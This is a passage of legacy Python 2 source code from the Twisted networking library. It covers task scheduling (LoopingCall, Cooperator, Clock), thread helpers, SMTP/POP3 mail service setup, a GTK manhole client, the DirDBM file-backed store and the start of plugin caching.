@param now: If True, run this call right now. Otherwise, wait
until the interval has elapsed before beginning.
@return: A Deferred whose callback will be invoked with
C{self} when C{self.stop} is called, or whose errback will be
invoked when the function raises an exception or returned a
deferred that has its errback invoked.
"""
assert not self.running, ("Tried to start an already running "
"LoopingCall.")
if interval < 0:
raise ValueError, "interval must be >= 0"
self.running = True
d = self.deferred = defer.Deferred()
self.starttime = self._seconds()
self.count = 0
self.interval = interval
if now:
self()
else:
self._reschedule()
return d
def stop(self):
"""Stop running function.
"""
assert self.running, ("Tried to stop a LoopingCall that was "
"not running.")
self.running = False
if self.call is not None:
self.call.cancel()
self.call = None
d, self.deferred = self.deferred, None
d.callback(self)
def __call__(self):
def cb(result):
if self.running:
self._reschedule()
else:
d, self.deferred = self.deferred, None
d.callback(self)
def eb(failure):
self.running = False
d, self.deferred = self.deferred, None
d.errback(failure)
self.call = None
d = defer.maybeDeferred(self.f, *self.a, **self.kw)
d.addCallback(cb)
d.addErrback(eb)
def _reschedule(self):
if self.interval == 0:
self.call = self._callLater(0)
return
fromNow = self.starttime - self._seconds()
while self.running:
self.count += 1
fromStart = self.count * self.interval
delay = fromNow + fromStart
if delay > 0:
self.call = self._callLater(delay)
return
def __repr__(self):
if hasattr(self.f, 'func_name'):
func = self.f.func_name
if hasattr(self.f, 'im_class'):
func = self.f.im_class.__name__ + '.' + func
else:
func = reflect.safe_repr(self.f)
return 'LoopingCall<%r>(%s, *%s, **%s)' % (
self.interval, func, reflect.safe_repr(self.a),
reflect.safe_repr(self.kw))
class SchedulerStopped(Exception):
"""
The operation could not complete because the scheduler was stopped in
progress or was already stopped.
"""
class _Timer(object):
MAX_SLICE = 0.01
def __init__(self):
self.end = time.time() + self.MAX_SLICE
def __call__(self):
return time.time() >= self.end
_EPSILON = 0.00000001
def _defaultScheduler(x):
from twisted.internet import reactor
return reactor.callLater(_EPSILON, x)
class Cooperator(object):
"""
Cooperative task scheduler.
"""
def __init__(self,
terminationPredicateFactory=_Timer,
scheduler=_defaultScheduler,
started=True):
"""
Create a scheduler-like object to which iterators may be added.
@param terminationPredicateFactory: A no-argument callable which will
be invoked at the beginning of each step and should return a
no-argument callable which will return False when the step should be
terminated. The default factory is time-based and allows iterators to
run for 1/100th of a second at a time.
@param scheduler: A one-argument callable which takes a no-argument
callable and should invoke it at some future point. This will be used
to schedule each step of this Cooperator.
@param started: A boolean which indicates whether iterators should be
stepped as soon as they are added, or if they will be queued up until
L{Cooperator.start} is called.
"""
self.iterators = []
self._metarator = iter(())
self._terminationPredicateFactory = terminationPredicateFactory
self._scheduler = scheduler
self._delayedCall = None
self._stopped = False
self._started = started
def coiterate(self, iterator, doneDeferred=None):
"""
Add an iterator to the list of iterators I am currently running.
@return: a Deferred that will fire when the iterator finishes.
"""
if doneDeferred is None:
doneDeferred = defer.Deferred()
if self._stopped:
doneDeferred.errback(SchedulerStopped())
return doneDeferred
self.iterators.append((iterator, doneDeferred))
self._reschedule()
return doneDeferred
def _tasks(self):
terminator = self._terminationPredicateFactory()
while self.iterators:
for i in self._metarator:
yield i
if terminator():
return
self._metarator = iter(self.iterators)
def _tick(self):
"""
Run one scheduler tick.
"""
self._delayedCall = None
for taskObj in self._tasks():
iterator, doneDeferred = taskObj
try:
result = iterator.next()
except StopIteration:
self.iterators.remove(taskObj)
doneDeferred.callback(iterator)
except:
self.iterators.remove(taskObj)
doneDeferred.errback()
else:
if isinstance(result, defer.Deferred):
self.iterators.remove(taskObj)
def cbContinue(result, taskObj=taskObj):
self.coiterate(*taskObj)
result.addCallbacks(cbContinue, doneDeferred.errback)
self._reschedule()
_mustScheduleOnStart = False
def _reschedule(self):
if not self._started:
self._mustScheduleOnStart = True
return
if self._delayedCall is None and self.iterators:
self._delayedCall = self._scheduler(self._tick)
def start(self):
"""
Begin scheduling steps.
"""
self._stopped = False
self._started = True
if self._mustScheduleOnStart:
del self._mustScheduleOnStart
self._reschedule()
def stop(self):
"""
Stop scheduling steps. Errback the completion Deferreds of all
iterators which have been added and forget about them.
"""
self._stopped = True
for iterator, doneDeferred in self.iterators:
doneDeferred.errback(SchedulerStopped())
self.iterators = []
if self._delayedCall is not None:
self._delayedCall.cancel()
self._delayedCall = None
_theCooperator = Cooperator()
def coiterate(iterator):
"""
Cooperatively iterate over the given iterator, dividing runtime between it
and all other iterators which have been passed to this function and not yet
exhausted.
"""
return _theCooperator.coiterate(iterator)
class Clock:
"""
Provide a deterministic, easily-controlled implementation of
L{IReactorTime.callLater}. This is commonly useful for writing
deterministic unit tests for code which schedules events using this API.
"""
rightNow = 0.0
def __init__(self):
self.calls = []
def seconds(self):
"""
Pretend to be time.time(). This is used internally when an operation
such as L{IDelayedCall.reset} needs to determine a a time value
relative to the current time.
@rtype: C{float}
@return: The time which should be considered the current time.
"""
return self.rightNow
def callLater(self, when, what, *a, **kw):
"""
See L{twisted.internet.interfaces.IReactorTime.callLater}.
"""
self.calls.append(
base.DelayedCall(self.seconds() + when,
what, a, kw,
self.calls.remove,
lambda c: None,
self.seconds))
self.calls.sort(lambda a, b: cmp(a.getTime(), b.getTime()))
return self.calls[-1]
def advance(self, amount):
"""
Move time on this clock forward by the given amount and run whatever
pending calls should be run.
@type amount: C{float}
@param amount: The number of seconds which to advance this clock's
time.
"""
self.rightNow += amount
while self.calls and self.calls[0].getTime() <= self.seconds():
call = self.calls.pop(0)
call.called = 1
call.func(*call.args, **call.kw)
def pump(self, timings):
"""
Advance incrementally by the given set of times.
@type timings: iterable of C{float}
"""
for amount in timings:
self.advance(amount)
__all__ = [
'LoopingCall',
'Clock',
'SchedulerStopped', 'Cooperator', 'coiterate',
]
```
#### File: twisted/internet/threads.py
```python
from twisted.python import log, failure
# sibling imports
from twisted.internet import defer
def _putResultInDeferred(deferred, f, args, kwargs):
"""Run a function and give results to a Deferred."""
from twisted.internet import reactor
try:
result = f(*args, **kwargs)
except:
f = failure.Failure()
reactor.callFromThread(deferred.errback, f)
else:
reactor.callFromThread(deferred.callback, result)
def deferToThread(f, *args, **kwargs):
"""Run function in thread and return result as Deferred."""
d = defer.Deferred()
from twisted.internet import reactor
reactor.callInThread(_putResultInDeferred, d, f, args, kwargs)
return d
def _runMultiple(tupleList):
"""Run a list of functions."""
for f, args, kwargs in tupleList:
f(*args, **kwargs)
def callMultipleInThread(tupleList):
"""Run a list of functions in the same thread.
tupleList should be a list of (function, argsList, kwargsDict) tuples.
"""
from twisted.internet import reactor
reactor.callInThread(_runMultiple, tupleList)
__all__ = ["deferToThread", "callMultipleInThread"]
```
#### File: twisted/mail/protocols.py
```python
from twisted.mail import pop3
from twisted.mail import smtp
from twisted.internet import protocol
from twisted.internet import defer
from twisted.copyright import longversion
from twisted.python import log
from twisted import cred
import twisted.cred.error
import twisted.cred.credentials
from twisted.mail import relay
from zope.interface import implements
class DomainDeliveryBase:
"""A server that uses twisted.mail service's domains."""
implements(smtp.IMessageDelivery)
service = None
protocolName = None
def __init__(self, service, user, host=smtp.DNSNAME):
self.service = service
self.user = user
self.host = host
def receivedHeader(self, helo, origin, recipients):
authStr = heloStr = ""
if self.user:
authStr = " auth=%s" % (self.user.encode('xtext'),)
if helo[0]:
heloStr = " helo=%s" % (helo[0],)
from_ = "from %s ([%s]%s%s)" % (helo[0], helo[1], heloStr, authStr)
by = "by %s with %s (%s)" % (
self.host, self.protocolName, longversion
)
for_ = "for <%s>; %s" % (' '.join(map(str, recipients)), smtp.rfc822date())
return "Received: %s\n\t%s\n\t%s" % (from_, by, for_)
def validateTo(self, user):
# XXX - Yick. This needs cleaning up.
if self.user and self.service.queue:
d = self.service.domains.get(user.dest.domain, None)
if d is None:
d = relay.DomainQueuer(self.service, True)
else:
d = self.service.domains[user.dest.domain]
return defer.maybeDeferred(d.exists, user)
def validateFrom(self, helo, origin):
if not helo:
raise smtp.SMTPBadSender(origin, 503, "Who are you? Say HELO first.")
if origin.local != '' and origin.domain == '':
raise smtp.SMTPBadSender(origin, 501, "Sender address must contain domain.")
return origin
def startMessage(self, users):
ret = []
for user in users:
ret.append(self.service.domains[user.dest.domain].startMessage(user))
return ret
class SMTPDomainDelivery(DomainDeliveryBase):
protocolName = 'smtp'
class ESMTPDomainDelivery(DomainDeliveryBase):
protocolName = 'esmtp'
class DomainSMTP(SMTPDomainDelivery, smtp.SMTP):
service = user = None
def __init__(self, *args, **kw):
import warnings
warnings.warn(
"DomainSMTP is deprecated. Use IMessageDelivery objects instead.",
DeprecationWarning, stacklevel=2,
)
smtp.SMTP.__init__(self, *args, **kw)
if self.delivery is None:
self.delivery = self
class DomainESMTP(ESMTPDomainDelivery, smtp.ESMTP):
service = user = None
def __init__(self, *args, **kw):
import warnings
warnings.warn(
"DomainESMTP is deprecated. Use IMessageDelivery objects instead.",
DeprecationWarning, stacklevel=2,
)
smtp.ESMTP.__init__(self, *args, **kw)
if self.delivery is None:
self.delivery = self
class SMTPFactory(smtp.SMTPFactory):
"""A protocol factory for SMTP."""
protocol = smtp.SMTP
portal = None
def __init__(self, service, portal = None):
smtp.SMTPFactory.__init__(self)
self.service = service
self.portal = portal
def buildProtocol(self, addr):
log.msg('Connection from %s' % (addr,))
p = smtp.SMTPFactory.buildProtocol(self, addr)
p.service = self.service
p.portal = self.portal
return p
class ESMTPFactory(SMTPFactory):
protocol = smtp.ESMTP
context = None
def __init__(self, *args):
SMTPFactory.__init__(self, *args)
self.challengers = {
'CRAM-MD5': cred.credentials.CramMD5Credentials
}
def buildProtocol(self, addr):
p = SMTPFactory.buildProtocol(self, addr)
p.challengers = self.challengers
p.ctx = self.context
return p
class VirtualPOP3(pop3.POP3):
"""Virtual hosting POP3."""
service = None
domainSpecifier = '@' # Gaagh! I hate POP3. No standardized way
# to indicate user@host. '@' doesn't work
# with NS, e.g.
def authenticateUserAPOP(self, user, digest):
# Override the default lookup scheme to allow virtual domains
user, domain = self.lookupDomain(user)
try:
portal = self.service.lookupPortal(domain)
except KeyError:
return defer.fail(cred.error.UnauthorizedLogin())
else:
return portal.login(
pop3.APOPCredentials(self.magic, user, digest),
None,
pop3.IMailbox
)
def authenticateUserPASS(self, user, password):
user, domain = self.lookupDomain(user)
try:
portal = self.service.lookupPortal(domain)
except KeyError:
return defer.fail(cred.error.UnauthorizedLogin())
else:
return portal.login(
cred.credentials.UsernamePassword(user, password),
None,
pop3.IMailbox
)
def lookupDomain(self, user):
try:
user, domain = user.split(self.domainSpecifier, 1)
except ValueError:
domain = ''
if domain not in self.service.domains:
raise pop3.POP3Error("no such domain %s" % domain)
return user, domain
class POP3Factory(protocol.ServerFactory):
"""POP3 protocol factory."""
protocol = VirtualPOP3
service = None
def __init__(self, service):
self.service = service
def buildProtocol(self, addr):
p = protocol.ServerFactory.buildProtocol(self, addr)
p.service = self.service
return p
#
# It is useful to know, perhaps, that the required file for this to work can
# be created thusly:
#
# openssl req -x509 -newkey rsa:2048 -keyout file.key -out file.crt \
# -days 365 -nodes
#
# And then cat file.key and file.crt together. The number of days and bits
# can be changed, of course.
#
class SSLContextFactory:
"""An SSL Context Factory
This loads a certificate and private key from a specified file.
"""
def __init__(self, filename):
self.filename = filename
def getContext(self):
"""Create an SSL context."""
from OpenSSL import SSL
ctx = SSL.Context(SSL.SSLv23_METHOD)
ctx.use_certificate_file(self.filename)
ctx.use_privatekey_file(self.filename)
return ctx
```
#### File: twisted/mail/tap.py
```python
import os
import sys
from twisted.mail import mail
from twisted.mail import maildir
from twisted.mail import relay
from twisted.mail import relaymanager
from twisted.mail import alias
from twisted.python import usage
from twisted.cred import checkers
from twisted.application import internet
class Options(usage.Options):
synopsis = "Usage: mktap mail [options]"
optParameters = [
["pop3", "p", 8110, "Port to start the POP3 server on (0 to disable)."],
["pop3s", "S", 0, "Port to start the POP3-over-SSL server on (0 to disable)."],
["smtp", "s", 8025, "Port to start the SMTP server on (0 to disable)."],
["certificate", "c", None, "Certificate file to use for SSL connections"],
["relay", "R", None,
"Relay messages according to their envelope 'To', using the given"
"path as a queue directory."],
["hostname", "H", None, "The hostname by which to identify this server."],
]
optFlags = [
["esmtp", "E", "Use RFC 1425/1869 SMTP extensions"],
["disable-anonymous", None, "Disallow non-authenticated SMTP connections"],
]
zsh_actions = {"hostname" : "_hosts"}
longdesc = "This creates a mail.tap file that can be used by twistd."
def __init__(self):
usage.Options.__init__(self)
self.service = mail.MailService()
self.last_domain = None
def opt_passwordfile(self, filename):
"""Specify a file containing username:password login info for authenticated ESMTP connections."""
ch = checkers.OnDiskUsernamePasswordDatabase(filename)
self.service.smtpPortal.registerChecker(ch)
opt_P = opt_passwordfile
def opt_default(self):
"""Make the most recently specified domain the default domain."""
if self.last_domain:
self.service.addDomain('', self.last_domain)
else:
raise usage.UsageError("Specify a domain before specifying using --default")
opt_D = opt_default
def opt_maildirdbmdomain(self, domain):
"""generate an SMTP/POP3 virtual domain which saves to \"path\"
"""
try:
name, path = domain.split('=')
except ValueError:
raise usage.UsageError("Argument to --maildirdbmdomain must be of the form 'name=path'")
self.last_domain = maildir.MaildirDirdbmDomain(self.service, os.path.abspath(path))
self.service.addDomain(name, self.last_domain)
opt_d = opt_maildirdbmdomain
def opt_user(self, user_pass):
"""add a user/password to the last specified domains
"""
try:
user, password = user_pass.split('=', 1)
except ValueError:
raise usage.UsageError("Argument to --user must be of the form 'user=password'")
if self.last_domain:
self.last_domain.addUser(user, password)
else:
raise usage.UsageError("Specify a domain before specifying users")
opt_u = opt_user
def opt_bounce_to_postmaster(self):
"""undelivered mails are sent to the postmaster
"""
self.last_domain.postmaster = 1
opt_b = opt_bounce_to_postmaster
def opt_aliases(self, filename):
"""Specify an aliases(5) file to use for this domain"""
if self.last_domain is not None:
if mail.IAliasableDomain.providedBy(self.last_domain):
aliases = alias.loadAliasFile(self.service.domains, filename)
self.last_domain.setAliasGroup(aliases)
self.service.monitor.monitorFile(
filename,
AliasUpdater(self.service.domains, self.last_domain)
)
else:
raise usage.UsageError(
"%s does not support alias files" % (
self.last_domain.__class__.__name__,
)
)
else:
raise usage.UsageError("Specify a domain before specifying aliases")
opt_A = opt_aliases
def postOptions(self):
for f in ('pop3', 'smtp', 'pop3s'):
try:
self[f] = int(self[f])
if not (0 <= self[f] < 2 ** 16):
raise ValueError
except ValueError:
raise usage.UsageError(
'Invalid port specified to --%s: %s' % (f, self[f])
)
if self['pop3s']:
if not self['certificate']:
raise usage.UsageError("Cannot specify --pop3s without "
"--certificate")
elif not os.path.exists(self['certificate']):
raise usage.UsageError("Certificate file %r does not exist."
% self['certificate'])
if not self['disable-anonymous']:
self.service.smtpPortal.registerChecker(checkers.AllowAnonymousAccess())
if not (self['pop3'] or self['smtp'] or self['pop3s']):
raise usage.UsageError("You cannot disable all protocols")
class AliasUpdater:
def __init__(self, domains, domain):
self.domains = domains
self.domain = domain
def __call__(self, new):
self.domain.setAliasGroup(alias.loadAliasFile(self.domains, new))
def makeService(config):
if config['esmtp']:
rmType = relaymanager.SmartHostESMTPRelayingManager
smtpFactory = config.service.getESMTPFactory
else:
rmType = relaymanager.SmartHostSMTPRelayingManager
smtpFactory = config.service.getSMTPFactory
if config['relay']:
dir = config['relay']
if not os.path.isdir(dir):
os.mkdir(dir)
config.service.setQueue(relaymanager.Queue(dir))
default = relay.DomainQueuer(config.service)
manager = rmType(config.service.queue)
if config['esmtp']:
manager.fArgs += (None, None)
manager.fArgs += (config['hostname'],)
helper = relaymanager.RelayStateHelper(manager, 1)
helper.setServiceParent(config.service)
config.service.domains.setDefaultDomain(default)
ctx = None
if config['certificate']:
from twisted.mail.protocols import SSLContextFactory
ctx = SSLContextFactory(config['certificate'])
if config['pop3']:
s = internet.TCPServer(config['pop3'], config.service.getPOP3Factory())
s.setServiceParent(config.service)
if config['pop3s']:
s = internet.SSLServer(config['pop3s'],
config.service.getPOP3Factory(), ctx)
s.setServiceParent(config.service)
if config['smtp']:
f = smtpFactory()
f.context = ctx
if config['hostname']:
f.domain = config['hostname']
f.fArgs = (f.domain,)
if config['esmtp']:
f.fArgs = (None, None) + f.fArgs
s = internet.TCPServer(config['smtp'], f)
s.setServiceParent(config.service)
return config.service
```
#### File: manhole/ui/gtkmanhole.py
```python
import code, string, sys, traceback, types
import gtk
from twisted.python import rebuild, util
from twisted.spread.ui import gtkutil
from twisted.spread import pb
from twisted.manhole import explorer
True = gtk.TRUE
False = gtk.FALSE
try:
import spelunk_gnome
except ImportError:
_GNOME_POWER = False
else:
_GNOME_POWER = True
## def findBeginningOfLineWithPoint(entry):
## pos = entry.get_point()
## while pos:
## pos = pos - 1
## c = entry.get_chars(pos, pos+1)
## if c == '\n':
## return pos+1
## return 0
import pywidgets
class Interaction(pywidgets.Interaction, pb.Referenceable):
loginWindow = None
capabilities = {
"Explorer": 'Set',
}
def __init__(self):
pywidgets.Interaction.__init__(self)
self.signal_connect('destroy', gtk.mainquit, None)
if _GNOME_POWER:
self.display = BrowserDisplay()
dWindow = gtk.GtkWindow(title="Spelunking")
dWindow.add(self.display)
dWindow.show_all()
self.display.makeDefaultCanvas()
else:
self.display = BrowserDisplay(self)
# The referencable attached to the Perspective
self.client = self
def remote_console(self, message):
self.output.console(message)
def remote_receiveExplorer(self, xplorer):
if _GNOME_POWER:
self.display.receiveExplorer(xplorer)
else:
XXX # text display?
def remote_listCapabilities(self):
return self.capabilities
def connected(self, perspective):
self.loginWindow.hide()
self.name = self.loginWindow.username.get_text()
self.hostname = self.loginWindow.hostname.get_text()
perspective.broker.notifyOnDisconnect(self.connectionLost)
self.perspective = perspective
self.show_all()
self.set_title("Manhole: %s@%s" % (self.name, self.hostname))
def connectionLost(self, reason=None):
if not reason:
reason = "Connection Lost"
self.loginWindow.loginReport(reason)
self.hide()
self.loginWindow.show()
def codeInput(self, text):
methodName = 'do'
if text[0] == '/':
split = string.split(text[1:],' ',1)
statement = split[0]
if len(split) == 2:
remainder = split[1]
if statement in ('browse', 'explore'):
methodName = 'explore'
text = remainder
elif statement == 'watch':
methodName = 'watch'
text = remainder
elif statement == 'self_rebuild':
rebuild.rebuild(explorer)
if _GNOME_POWER:
rebuild.rebuild(spelunk_gnome)
rebuild.rebuild(sys.modules[__name__])
return
try:
self.perspective.callRemote(methodName, text)
except pb.ProtocolError:
# ASSUMPTION: pb.ProtocolError means we lost our connection.
(eType, eVal, tb) = sys.exc_info()
del tb
s = string.join(traceback.format_exception_only(eType, eVal),
'')
self.connectionLost(s)
except:
traceback.print_exc()
gtk.mainquit()
class LineOrientedBrowserDisplay:
def __init__(self, toplevel=None):
if toplevel:
self.toplevel = toplevel
def receiveBrowserObject(self, obj):
"""Display a browser ObjectLink.
"""
# This is a stop-gap implementation. Ideally, everything
# would be nicely formatted with pretty colours and you could
# select referenced objects to browse them with
# browse(selectedLink.identifier)
if obj.type in map(explorer.typeString, [types.FunctionType,
types.MethodType]):
arglist = []
for arg in obj.value['signature']:
if arg.has_key('default'):
a = "%s=%s" % (arg['name'], arg['default'])
elif arg.has_key('list'):
a = "*%s" % (arg['name'],)
elif arg.has_key('keywords'):
a = "**%s" % (arg['name'],)
else:
a = arg['name']
arglist.append(a)
things = ''
if obj.value.has_key('class'):
things = "Class: %s\n" % (obj.value['class'],)
if obj.value.has_key('self'):
things = things + "Self: %s\n" % (obj.value['self'],)
s = "%(name)s(%(arglist)s)\n%(things)s\n%(doc)s\n" % {
'name': obj.value['name'],
'doc': obj.value['doc'],
'things': things,
'arglist': string.join(arglist,", "),
}
else:
s = str(obj) + '\n'
self.toplevel.output.console([('stdout',s)])
if _GNOME_POWER:
BrowserDisplay = spelunk_gnome.SpelunkDisplay
else:
BrowserDisplay = LineOrientedBrowserDisplay
class Signature(pb.RemoteCopy, explorer.Signature):
def __init__(self):
pass
__str__ = explorer.Signature.__str__
pb.setCopierForClass('twisted.manhole.explorer.Signature', Signature)
```
#### File: twisted/persisted/dirdbm.py
```python
import os
import types
import base64
import glob
try:
import cPickle as pickle
except ImportError:
import pickle
try:
_open
except NameError:
_open = open
class DirDBM:
"""A directory with a DBM interface.
This class presents a hash-like interface to a directory of small,
flat files. It can only use strings as keys or values.
"""
def __init__(self, name):
"""
@type name: str
@param name: Base path to use for the directory storage.
"""
self.dname = os.path.abspath(name)
if not os.path.isdir(self.dname):
os.mkdir(self.dname)
else:
# Run recovery, in case we crashed. we delete all files ending
# with ".new". Then we find all files who end with ".rpl". If a
# corresponding file exists without ".rpl", we assume the write
# failed and delete the ".rpl" file. If only a ".rpl" exist we
# assume the program crashed right after deleting the old entry
# but before renaming the replacement entry.
#
# NOTE: '.' is NOT in the base64 alphabet!
for f in glob.glob(os.path.join(self.dname, "*.new")):
os.remove(f)
replacements = glob.glob(os.path.join(self.dname, "*.rpl"))
for f in replacements:
old = f[:-4]
if os.path.exists(old):
os.remove(f)
else:
os.rename(f, old)
def _encode(self, k):
"""Encode a key so it can be used as a filename.
"""
# NOTE: '_' is NOT in the base64 alphabet!
return base64.encodestring(k).replace('\n', '_').replace("/", "-")
def _decode(self, k):
"""Decode a filename to get the key.
"""
return base64.decodestring(k.replace('_', '\n').replace("-", "/"))
def _readFile(self, path):
"""Read in the contents of a file.
Override in subclasses to e.g. provide transparently encrypted dirdbm.
"""
f = _open(path, "rb")
s = f.read()
f.close()
return s
def _writeFile(self, path, data):
"""Write data to a file.
Override in subclasses to e.g. provide transparently encrypted dirdbm.
"""
f = _open(path, "wb")
f.write(data)
f.flush()
f.close()
def __len__(self):
"""
@return: The number of key/value pairs in this Shelf
"""
return len(os.listdir(self.dname))
def __setitem__(self, k, v):
"""
C{dirdbm[k] = v}
Create or modify a textfile in this directory
@type k: str
@param k: key to set
@type v: str
@param v: value to associate with C{k}
"""
assert type(k) == types.StringType, AssertionError("DirDBM key must be a string")
assert type(v) == types.StringType, AssertionError("DirDBM value must be a string")
k = self._encode(k)
# we create a new file with extension .new, write the data to it, and
# if the write succeeds delete the old file and rename the new one.
old = os.path.join(self.dname, k)
if os.path.exists(old):
new = old + ".rpl" # replacement entry
else:
new = old + ".new" # new entry
try:
self._writeFile(new, v)
except:
os.remove(new)
raise
else:
if os.path.exists(old): os.remove(old)
os.rename(new, old)
def __getitem__(self, k):
"""
C{dirdbm[k]}
Get the contents of a file in this directory as a string.
@type k: str
@param k: key to lookup
@return: The value associated with C{k}
@raise KeyError: Raised when there is no such key
"""
assert type(k) == types.StringType, AssertionError("DirDBM key must be a string")
path = os.path.join(self.dname, self._encode(k))
try:
return self._readFile(path)
except:
raise KeyError, k
def __delitem__(self, k):
"""
C{del dirdbm[foo]}
Delete a file in this directory.
@type k: str
@param k: key to delete
@raise KeyError: Raised when there is no such key
"""
assert type(k) == types.StringType, AssertionError("DirDBM key must be a string")
k = self._encode(k)
try: os.remove(os.path.join(self.dname, k))
except (OSError, IOError): raise KeyError(self._decode(k))
def keys(self):
"""
@return: a C{list} of filenames (keys).
"""
return map(self._decode, os.listdir(self.dname))
def values(self):
"""
@return: a C{list} of file-contents (values).
"""
vals = []
keys = self.keys()
for key in keys:
vals.append(self[key])
return vals
def items(self):
"""
@return: a C{list} of 2-tuples containing key/value pairs.
"""
items = []
keys = self.keys()
for key in keys:
items.append((key, self[key]))
return items
def has_key(self, key):
"""
@type key: str
@param key: The key to test
@return: A true value if this dirdbm has the specified key, a faluse
value otherwise.
"""
assert type(key) == types.StringType, AssertionError("DirDBM key must be a string")
key = self._encode(key)
return os.path.isfile(os.path.join(self.dname, key))
def setdefault(self, key, value):
"""
@type key: str
@param key: The key to lookup
@param value: The value to associate with key if key is not already
associated with a value.
"""
if not self.has_key(key):
self[key] = value
return value
return self[key]
def get(self, key, default = None):
"""
@type key: str
@param key: The key to lookup
@param default: The value to return if the given key does not exist
@return: The value associated with C{key} or C{default} if not
C{self.has_key(key)}
"""
if self.has_key(key):
return self[key]
else:
return default
def __contains__(self, key):
"""
C{key in dirdbm}
@type key: str
@param key: The key to test
@return: A true value if C{self.has_key(key)}, a false value otherwise.
"""
assert type(key) == types.StringType, AssertionError("DirDBM key must be a string")
key = self._encode(key)
return os.path.isfile(os.path.join(self.dname, key))
def update(self, dict):
"""
Add all the key/value pairs in C{dict} to this dirdbm. Any conflicting
keys will be overwritten with the values from C{dict}.
@type dict: mapping
@param dict: A mapping of key/value pairs to add to this dirdbm.
"""
for key, val in dict.items():
self[key]=val
def copyTo(self, path):
"""
Copy the contents of this dirdbm to the dirdbm at C{path}.
@type path: C{str}
@param path: The path of the dirdbm to copy to. If a dirdbm
exists at the destination path, it is cleared first.
@rtype: C{DirDBM}
@return: The dirdbm this dirdbm was copied to.
"""
path = os.path.abspath(path)
assert path != self.dname
d = self.__class__(path)
d.clear()
for k in self.keys():
d[k] = self[k]
return d
def clear(self):
"""
Delete all key/value pairs in this dirdbm.
"""
for k in self.keys():
del self[k]
def close(self):
"""
Close this dbm: no-op, for dbm-style interface compliance.
"""
def getModificationTime(self, key):
"""
Returns modification time of an entry.
@return: Last modification date (seconds since epoch) of entry C{key}
@raise KeyError: Raised when there is no such key
"""
assert type(key) == types.StringType, AssertionError("DirDBM key must be a string")
path = os.path.join(self.dname, self._encode(key))
if os.path.isfile(path):
return os.path.getmtime(path)
else:
raise KeyError, key
class Shelf(DirDBM):
"""A directory with a DBM shelf interface.
This class presents a hash-like interface to a directory of small,
flat files. Keys must be strings, but values can be any given object.
"""
def __setitem__(self, k, v):
"""
C{shelf[foo] = bar}
Create or modify a textfile in this directory.
@type k: str
@param k: The key to set
@param v: The value to associate with C{key}
"""
v = pickle.dumps(v)
DirDBM.__setitem__(self, k, v)
def __getitem__(self, k):
"""
C{dirdbm[foo]}
Get and unpickle the contents of a file in this directory.
@type k: str
@param k: The key to lookup
@return: The value associated with the given key
@raise KeyError: Raised if the given key does not exist
"""
return pickle.loads(DirDBM.__getitem__(self, k))
def open(file, flag = None, mode = None):
"""
This is for 'anydbm' compatibility.
@param file: The parameter to pass to the DirDBM constructor.
@param flag: ignored
@param mode: ignored
"""
return DirDBM(file)
__all__ = ["open", "DirDBM", "Shelf"]
```
#### File: site-packages/twisted/plugin.py
```python
from __future__ import generators
import os, errno
from zope.interface import Interface, providedBy
try:
import cPickle as pickle
except ImportError:
import pickle
from twisted.python.components import getAdapterFactory
from twisted.python.reflect import namedAny
from twisted.python.win32 import ERROR_FILE_NOT_FOUND, ERROR_PATH_NOT_FOUND
from twisted.python.win32 import ERROR_INVALID_NAME, WindowsError
from twisted.python import log
try:
from os import stat_float_times
from os.path import getmtime as _getmtime
def getmtime(x):
sft = stat_float_times()
stat_float_times(True)
try:
return _getmtime(x)
finally:
stat_float_times(sft)
except:
from os.path import getmtime
class IPlugin(Interface):
"""Interface that must be implemented by all plugins.
Only objects which implement this interface will be considered for
return by C{getPlugins}. To be useful, plugins should also
implement some other application-specific interface.
"""
class ITestPlugin(Interface):
"""A plugin for use by the plugin system's unit tests.
Do not use this.
"""
class ITestPlugin2(Interface):
"""See L{ITestPlugin}.
"""
class CachedPlugin(object):
def __init__(self, dropin, name, description, provided):
self.dropin = dropin
self.name = name
self.description = description
self.provided = provided
self.dropin.plugins.append(self)
def __repr__(self):
return '<CachedPlugin %r/%r (provides %r)>' % (
self.name, self.dropin.moduleName,
', '.join([i.__name__ for i in self.provided]))
def load(self):
return namedAny(self.dropin.moduleName + '.' + self.name)
def __conform__(self, interface, registry=None, default=None):
for providedInterface in self.provided:
if providedInterface.isOrExtends(interface):
return self.load()
if getAdapterFactory(providedInterface, interface, None) is not None:
return interface(self.load(), default)
return default
# backwards compat HOORJ
getComponent = __conform__
class CachedDropin(object):
def __init__(self, moduleName, description):
self.moduleName = moduleName
self.description = description
self.plugins = []
def _generateCacheEntry(provider):
dropin = CachedDropin(provider.__name__,
provider.__doc__)
for k, v in provider.__dict__.iteritems():
plugin = IPlugin(v, None)
if plugin is not None:
cachedPlugin = CachedPlugin(dropin, k, v.__doc__, list(providedBy(plugin)))
return dropin
try:
fromkeys = dict.fromkeys
except AttributeError:
def fromkeys(keys, value=None):
d = {}
for k in keys:
d[k] = value
return d
_exts = fromkeys(['.py', '.so', '.pyd', '.dll'])
def getCache(module):
topcache = {}
for p in module.__path__:
dropcache = os.path.join(p, "dropin.cache")
try:
cache = pickle.load(file(dropcache))
lastCached = getmtime(dropcache)
dirtyCache = False
except:
cache = {}
lastCached = 0
dirtyCache = True
try:
dropinNames = os.listdir(p)
except WindowsError, e:
# WindowsError is an OSError subclass, so if not for this clause
# the OSError clause below would be handling these. Windows
# error codes aren't the same as POSIX error codes, so we need
# to handle them differently.
# Under Python 2.5 on Windows, WindowsError has a winerror
# attribute and an errno attribute. The winerror attribute is
# bound to the Windows error code while the errno attribute is
# bound to a translation of that code to a perhaps equivalent
# POSIX error number.
# Under Python 2.4 on Windows, WindowsError only has an errno
# attribute. It is bound to the Windows error code.
# For simplicity of code and to keep the number of paths through
# this suite minimal, we grab the Windows error code under
# either version.
# Furthermore, attempting to use os.listdir on a non-existent
# path in Python 2.4 will result in a Windows error code of
# ERROR_PATH_NOT_FOUND. However, in Python 2.5,
# ERROR_FILE_NOT_FOUND results instead. -exarkun
err = getattr(e, 'winerror', e.errno)
if err in (ERROR_PATH_NOT_FOUND, ERROR_FILE_NOT_FOUND):
continue
elif err == ERROR_INVALID_NAME:
log.msg("Invalid path %r in search path for %s" % (p, module.__name__))
continue
else:
raise
except OSError, ose:
if ose.errno not in (errno.ENOENT, errno.ENOTDIR):
raise
else:
continue
else:
pys = {}
for dropinName in dropinNames:
moduleName, moduleExt = os.path.splitext(dropinName)
if moduleName != '__init__' and moduleExt in _exts:
pyFile = os.path.join(p, dropinName)
try:
pys[moduleName] = getmtime(pyFile)
except:
log.err()
for moduleName, lastChanged in pys.iteritems():
if lastChanged >= lastCached or moduleName not in cache:
dirtyCache = True
try:
